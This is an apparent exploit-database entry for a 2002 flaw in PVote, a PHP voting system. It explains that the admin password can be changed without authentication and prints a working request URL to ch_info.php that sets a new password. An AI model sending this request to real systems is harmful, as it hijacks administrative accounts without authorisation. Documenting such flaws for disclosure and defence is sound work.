header-logo
Suggest Exploit
vendor:
PVote
by:
SecurityFocus
7.5
CVSS
HIGH
Password Change Vulnerability
264
CWE
Product Name: PVote
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix, Linux, Windows
2002

PVote Administrative Password Change Vulnerability

PVote is a web voting system written in PHP. It is possible to change the administrative password by submitting a malicious web request containing the appropriate values for the URL parameters. No authentication credentials are required.

Mitigation:

Ensure that authentication credentials are required for any administrative password changes.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4541/info

PVote is a web voting system written in PHP. It will run on most Unix and Linux variants as well as Microsoft Windows operating systems.

It is possible to change the administrative password by submitting a malicious web request containing the appropriate values for the URL parameters. No authentication credentials are required. 

http://target/pvote/ch_info.php?newpass=password&confirm=password

where password is the attacker-supplied value for the new administrative password.

Navigation

Suggest Exploit

Services By CQR